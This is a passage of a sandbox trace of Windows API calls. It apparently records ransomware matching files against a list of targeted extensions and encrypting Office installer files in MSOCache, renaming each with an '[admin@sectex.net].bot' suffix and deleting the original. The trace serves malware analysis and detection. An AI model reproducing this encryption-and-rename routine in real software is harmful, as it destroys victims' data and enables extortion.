	[0044.748] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned 77
	[0044.748] lstrlenW (lpString=".doc") returned 4
	[0044.748] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1
	[0044.748] lstrlenW (lpString=".docx") returned 5
	[0044.748] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1
	[0044.748] lstrlenW (lpString=".pdf") returned 4
	[0044.748] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1
	[0044.748] lstrlenW (lpString=".xls") returned 4
	[0044.748] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1
	[0044.748] lstrlenW (lpString=".xlsx") returned 5
	[0044.748] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1
	[0044.748] lstrlenW (lpString=".ppt") returned 4
	[0044.748] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1
	[0044.748] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned 77
	[0044.748] lstrlenW (lpString=".zip") returned 4
	[0044.748] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1
	[0044.748] lstrlenW (lpString=".rar") returned 4
	[0044.748] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1
	[0044.748] lstrlenW (lpString=".bz2") returned 4
	[0044.748] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1
	[0044.748] lstrlenW (lpString=".7z") returned 3
	[0044.748] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1
	[0044.748] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned 77
	[0044.748] lstrlenW (lpString=".dbf") returned 4
	[0044.748] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1
	[0044.749] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned 77
	[0044.749] lstrlenW (lpString=".1cd") returned 4
	[0044.749] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1
	[0044.749] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned 77
	[0044.749] lstrlenW (lpString=".jpg") returned 4
	[0044.749] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1
	[0044.749] lstrcmpiW (lpString1=".EXE", lpString2=".bot") returned 1
	[0044.749] lstrlenW (lpString="DW20.EXE") returned 8
	[0044.749] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dw20.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc
	[0045.175] GetFileSizeEx (in: hFile=0x1fc, lpFileSize=0xa7dff1c | out: lpFileSize=0xa7dff1c*=838536) returned 1
	[0045.176] CloseHandle (hObject=0x1fc) returned 1
	[0045.176] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dw20.exe")) returned 0x2020
	[0045.178] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dw20.exe.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0045.179] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dw20.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170
	[0045.187] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0045.194] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0045.194] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dw20.exe.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc
	[0045.210] GetLastError () returned 0x0
	[0045.212] ReadFile (in: hFile=0x170, lpBuffer=0xb2d0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa7dfed4, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesRead=0xa7dfed4*=0xccb88, lpOverlapped=0x0) returned 1
	[0045.304] WriteFile (in: hFile=0x1fc, lpBuffer=0xb2d0020*, nNumberOfBytesToWrite=0xccb90, lpNumberOfBytesWritten=0xa7dfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesWritten=0xa7dfc9c*=0xccb90, lpOverlapped=0x0) returned 1
	[0045.318] ReadFile (in: hFile=0x170, lpBuffer=0xb2d0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa7dfed4, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesRead=0xa7dfed4*=0x0, lpOverlapped=0x0) returned 1
	[0045.318] WriteFile (in: hFile=0x1fc, lpBuffer=0xb2d0020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0xa7dfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesWritten=0xa7dfc9c*=0xe4, lpOverlapped=0x0) returned 1
	[0045.318] SetEndOfFile (hFile=0x1fc) returned 1
	[0045.318] CloseHandle (hObject=0x1fc) returned 1
	[0045.319] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0045.319] SetEndOfFile (hFile=0x170) returned 1
	[0045.326] CloseHandle (hObject=0x170) returned 1
	[0045.326] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0045.327] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dw20.exe")) returned 1
	[0045.327] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned 71
	[0045.327] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned 71
	[0045.327] lstrlenW (lpString=".doc") returned 4
	[0045.327] lstrcmpiW (lpString1=".doc", lpString2=".EXE") returned -1
	[0045.327] lstrlenW (lpString=".docx") returned 5
	[0045.327] lstrcmpiW (lpString1=".docx", lpString2="0.EXE") returned -1
	[0045.327] lstrlenW (lpString=".pdf") returned 4
	[0045.327] lstrcmpiW (lpString1=".pdf", lpString2=".EXE") returned 1
	[0045.327] lstrlenW (lpString=".xls") returned 4
	[0045.327] lstrcmpiW (lpString1=".xls", lpString2=".EXE") returned 1
	[0045.327] lstrlenW (lpString=".xlsx") returned 5
	[0045.327] lstrcmpiW (lpString1=".xlsx", lpString2="0.EXE") returned -1
	[0045.327] lstrlenW (lpString=".ppt") returned 4
	[0045.327] lstrcmpiW (lpString1=".ppt", lpString2=".EXE") returned 1
	[0045.327] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned 71
	[0045.327] lstrlenW (lpString=".zip") returned 4
	[0045.327] lstrcmpiW (lpString1=".zip", lpString2=".EXE") returned 1
	[0045.327] lstrlenW (lpString=".rar") returned 4
	[0045.327] lstrcmpiW (lpString1=".rar", lpString2=".EXE") returned 1
	[0045.327] lstrlenW (lpString=".bz2") returned 4
	[0045.327] lstrcmpiW (lpString1=".bz2", lpString2=".EXE") returned -1
	[0045.327] lstrlenW (lpString=".7z") returned 3
	[0045.328] lstrcmpiW (lpString1=".7z", lpString2="EXE") returned -1
	[0045.328] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned 71
	[0045.328] lstrlenW (lpString=".dbf") returned 4
	[0045.328] lstrcmpiW (lpString1=".dbf", lpString2=".EXE") returned -1
	[0045.328] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned 71
	[0045.328] lstrlenW (lpString=".1cd") returned 4
	[0045.328] lstrcmpiW (lpString1=".1cd", lpString2=".EXE") returned -1
	[0045.328] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned 71
	[0045.328] lstrlenW (lpString=".jpg") returned 4
	[0045.328] lstrcmpiW (lpString1=".jpg", lpString2=".EXE") returned 1
	[0045.328] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned 71
	[0045.328] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned 71
	[0045.328] lstrlenW (lpString=".doc") returned 4
	[0045.328] lstrcmpiW (lpString1=".doc", lpString2=".EXE") returned -1
	[0045.328] lstrlenW (lpString=".docx") returned 5
	[0045.328] lstrcmpiW (lpString1=".docx", lpString2="0.EXE") returned -1
	[0045.328] lstrlenW (lpString=".pdf") returned 4
	[0045.328] lstrcmpiW (lpString1=".pdf", lpString2=".EXE") returned 1
	[0045.328] lstrlenW (lpString=".xls") returned 4
	[0045.328] lstrcmpiW (lpString1=".xls", lpString2=".EXE") returned 1
	[0045.328] lstrlenW (lpString=".xlsx") returned 5
	[0045.328] lstrcmpiW (lpString1=".xlsx", lpString2="0.EXE") returned -1
	[0045.328] lstrlenW (lpString=".ppt") returned 4
	[0045.328] lstrcmpiW (lpString1=".ppt", lpString2=".EXE") returned 1
	[0045.328] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned 71
	[0045.328] lstrlenW (lpString=".zip") returned 4
	[0045.328] lstrcmpiW (lpString1=".zip", lpString2=".EXE") returned 1
	[0045.328] lstrlenW (lpString=".rar") returned 4
	[0045.328] lstrcmpiW (lpString1=".rar", lpString2=".EXE") returned 1
	[0045.328] lstrlenW (lpString=".bz2") returned 4
	[0045.328] lstrcmpiW (lpString1=".bz2", lpString2=".EXE") returned -1
	[0045.328] lstrlenW (lpString=".7z") returned 3
	[0045.328] lstrcmpiW (lpString1=".7z", lpString2="EXE") returned -1
	[0045.328] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned 71
	[0045.329] lstrlenW (lpString=".dbf") returned 4
	[0045.329] lstrcmpiW (lpString1=".dbf", lpString2=".EXE") returned -1
	[0045.329] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned 71
	[0045.329] lstrlenW (lpString=".1cd") returned 4
	[0045.329] lstrcmpiW (lpString1=".1cd", lpString2=".EXE") returned -1
	[0045.329] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned 71
	[0045.329] lstrlenW (lpString=".jpg") returned 4
	[0045.329] lstrcmpiW (lpString1=".jpg", lpString2=".EXE") returned 1
	[0045.329] lstrcmpiW (lpString1=".msi", lpString2=".bot") returned 1
	[0045.329] lstrlenW (lpString="OfficeMUI.msi") returned 13
	[0045.329] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170
	[0045.329] GetFileSizeEx (in: hFile=0x170, lpFileSize=0xa7dff1c | out: lpFileSize=0xa7dff1c*=3702272) returned 1
	[0045.329] CloseHandle (hObject=0x170) returned 1
	[0045.329] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.msi")) returned 0x2020
	[0045.329] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.msi.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0045.330] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.msi.id-9c354b42.[admin@sectex.net].bot")) returned 1
	[0045.330] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.msi.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170
	[0045.330] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfc6c | out: lpNewFilePointer=0x0) returned 1
	[0045.330] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfc2c | out: lpNewFilePointer=0x0) returned 1
	[0045.330] ReadFile (in: hFile=0x170, lpBuffer=0xb2d0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa7dfc38, lpOverlapped=0x0 | out: lpBuffer=0xb2d0058*, lpNumberOfBytesRead=0xa7dfc38*=0x40000, lpOverlapped=0x0) returned 1
	[0045.580] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x12d4aa, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfc2c | out: lpNewFilePointer=0x0) returned 1
	[0045.580] ReadFile (in: hFile=0x170, lpBuffer=0xb310058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa7dfc38, lpOverlapped=0x0 | out: lpBuffer=0xb310058*, lpNumberOfBytesRead=0xa7dfc38*=0x40000, lpOverlapped=0x0) returned 1
	[0045.587] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0xa7dfc6c | out: lpNewFilePointer=0xffffffff) returned 1
	[0045.587] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x347e00, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfc2c | out: lpNewFilePointer=0x0) returned 1
	[0045.587] ReadFile (in: hFile=0x170, lpBuffer=0xb350058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa7dfc38, lpOverlapped=0x0 | out: lpBuffer=0xb350058*, lpNumberOfBytesRead=0xa7dfc38*=0x40000, lpOverlapped=0x0) returned 1
	[0045.640] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0045.640] WriteFile (in: hFile=0x170, lpBuffer=0xb2d0020*, nNumberOfBytesToWrite=0xc0106, lpNumberOfBytesWritten=0xa7dfcb0, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesWritten=0xa7dfcb0*=0xc0106, lpOverlapped=0x0) returned 1
	[0046.181] SetEndOfFile (hFile=0x170) returned 1
	[0046.181] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x40000) returned 0xb472768
	[0046.181] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfc7c | out: lpNewFilePointer=0x0) returned 1
	[0046.181] WriteFile (in: hFile=0x170, lpBuffer=0xb472768*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa7dfc88, lpOverlapped=0x0 | out: lpBuffer=0xb472768*, lpNumberOfBytesWritten=0xa7dfc88*=0x40000, lpOverlapped=0x0) returned 1
	[0046.183] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x12d4aa, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfc7c | out: lpNewFilePointer=0x0) returned 1
	[0046.183] WriteFile (in: hFile=0x170, lpBuffer=0xb472768*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa7dfc88, lpOverlapped=0x0 | out: lpBuffer=0xb472768*, lpNumberOfBytesWritten=0xa7dfc88*=0x40000, lpOverlapped=0x0) returned 1
	[0046.187] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x347e00, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfc7c | out: lpNewFilePointer=0x0) returned 1
	[0046.187] WriteFile (in: hFile=0x170, lpBuffer=0xb472768*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa7dfc88, lpOverlapped=0x0 | out: lpBuffer=0xb472768*, lpNumberOfBytesWritten=0xa7dfc88*=0x40000, lpOverlapped=0x0) returned 1
	[0046.189] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb472768 | out: hHeap=0x7d60000) returned 1
	[0046.189] CloseHandle (hObject=0x170) returned 1
	[0046.189] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0046.189] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned 76
	[0046.189] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned 76
	[0046.189] lstrlenW (lpString=".doc") returned 4
	[0046.189] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1
	[0046.190] lstrlenW (lpString=".docx") returned 5
	[0046.190] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1
	[0046.190] lstrlenW (lpString=".pdf") returned 4
	[0046.190] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1
	[0046.190] lstrlenW (lpString=".xls") returned 4
	[0046.190] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1
	[0046.190] lstrlenW (lpString=".xlsx") returned 5
	[0046.190] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1
	[0046.190] lstrlenW (lpString=".ppt") returned 4
	[0046.190] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1
	[0046.190] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned 76
	[0046.190] lstrlenW (lpString=".zip") returned 4
	[0046.190] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1
	[0046.190] lstrlenW (lpString=".rar") returned 4
	[0046.190] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1
	[0046.190] lstrlenW (lpString=".bz2") returned 4
	[0046.190] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1
	[0046.190] lstrlenW (lpString=".7z") returned 3
	[0046.190] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1
	[0046.190] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned 76
	[0046.190] lstrlenW (lpString=".dbf") returned 4
	[0046.190] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1
	[0046.190] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned 76
	[0046.190] lstrlenW (lpString=".1cd") returned 4
	[0046.190] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1
	[0046.190] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned 76
	[0046.190] lstrlenW (lpString=".jpg") returned 4
	[0046.190] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1
	[0046.190] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned 76
	[0046.190] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned 76
	[0046.190] lstrlenW (lpString=".doc") returned 4
	[0046.190] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1
	[0046.190] lstrlenW (lpString=".docx") returned 5
	[0046.190] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1
	[0046.191] lstrlenW (lpString=".pdf") returned 4
	[0046.191] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1
	[0046.191] lstrlenW (lpString=".xls") returned 4
	[0046.191] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1
	[0046.191] lstrlenW (lpString=".xlsx") returned 5
	[0046.191] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1
	[0046.191] lstrlenW (lpString=".ppt") returned 4
	[0046.191] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1
	[0046.191] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned 76
	[0046.191] lstrlenW (lpString=".zip") returned 4
	[0046.191] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1
	[0046.191] lstrlenW (lpString=".rar") returned 4
	[0046.191] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1
	[0046.191] lstrlenW (lpString=".bz2") returned 4
	[0046.191] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1
	[0046.191] lstrlenW (lpString=".7z") returned 3
	[0046.191] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1
	[0046.191] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned 76
	[0046.191] lstrlenW (lpString=".dbf") returned 4
	[0046.191] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1
	[0046.191] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned 76
	[0046.191] lstrlenW (lpString=".1cd") returned 4
	[0046.191] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1
	[0046.191] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned 76
	[0046.191] lstrlenW (lpString=".jpg") returned 4
	[0046.191] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1
	[0046.191] lstrcmpiW (lpString1=".msi", lpString2=".bot") returned 1
	[0046.191] lstrlenW (lpString="Office32WW.msi") returned 14
	[0046.191] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170
	[0046.192] GetFileSizeEx (in: hFile=0x170, lpFileSize=0xa7dff1c | out: lpFileSize=0xa7dff1c*=1992192) returned 1
	[0046.192] CloseHandle (hObject=0x170) returned 1
	[0046.192] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.msi")) returned 0x2020
	[0046.192] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.msi.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0046.192] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.msi.id-9c354b42.[admin@sectex.net].bot")) returned 1
	[0046.192] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.msi.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170
	[0046.193] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfc6c | out: lpNewFilePointer=0x0) returned 1
	[0046.193] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfc2c | out: lpNewFilePointer=0x0) returned 1
	[0046.193] ReadFile (in: hFile=0x170, lpBuffer=0xb2d0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa7dfc38, lpOverlapped=0x0 | out: lpBuffer=0xb2d0058*, lpNumberOfBytesRead=0xa7dfc38*=0x40000, lpOverlapped=0x0) returned 1
	[0046.213] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xa2200, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfc2c | out: lpNewFilePointer=0x0) returned 1
	[0046.213] ReadFile (in: hFile=0x170, lpBuffer=0xb310058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa7dfc38, lpOverlapped=0x0 | out: lpBuffer=0xb310058*, lpNumberOfBytesRead=0xa7dfc38*=0x40000, lpOverlapped=0x0) returned 1
	[0046.232] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0xa7dfc6c | out: lpNewFilePointer=0xffffffff) returned 1
	[0046.233] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x1a6600, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfc2c | out: lpNewFilePointer=0x0) returned 1
	[0046.233] ReadFile (in: hFile=0x170, lpBuffer=0xb350058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa7dfc38, lpOverlapped=0x0 | out: lpBuffer=0xb350058*, lpNumberOfBytesRead=0xa7dfc38*=0x40000, lpOverlapped=0x0) returned 1
	[0046.370] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfec8 | out: lpNewFilePointer=0x0) returned 1
